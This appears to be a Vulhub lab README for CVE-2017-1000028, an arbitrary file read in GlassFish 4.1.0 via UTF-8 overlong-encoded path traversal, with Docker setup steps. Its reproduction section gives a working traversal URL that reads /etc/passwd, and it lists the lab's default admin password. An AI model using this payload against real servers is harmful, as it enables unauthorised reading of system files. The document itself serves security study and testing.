Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
37 lines
1.5 KiB
Markdown
37 lines
1.5 KiB
Markdown
# GlassFish 4.1.0 Arbitrary File Read (CVE-2017-1000028)
|
|
|
|
[中文版本(Chinese version)](README.zh-cn.md)
|
|
|
|
GlassFish is an open-source application server for the Java EE platform. A vulnerability in GlassFish allows attackers to read arbitrary files through UTF-8 Overlong Encoding attack.
|
|
|
|
The vulnerability exists because GlassFish does not properly handle UTF-8 Overlong Encoding when decoding URLs. As a result, `%c0%ae` is decoded as the ASCII character `.` (dot). By using `%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/` in the URL, an attacker can traverse directories and read arbitrary files on the system.
|
|
|
|
References:
|
|
|
|
- <https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904>
|
|
- <https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html>
|
|
|
|
## Environment Setup
|
|
|
|
Execute the following command to start a GlassFish server 4.1:
|
|
|
|
```
|
|
docker compose up -d
|
|
```
|
|
|
|
After the server starts, you can access GlassFish Admin Console on `http://your-ip:4848`.
|
|
|
|
## Vulnerability Reproduction
|
|
|
|
Visit the following URL to read the contents of `/etc/passwd`:
|
|
|
|
```
|
|
https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
|
```
|
|
|
|
|
|
|
|
### Additional Notes
|
|
|
|
The super administrator password is set in `docker-compose.yml`, with a default value of `vulhub_default_password`. You can use this password to log in to the admin account on port 4848.
|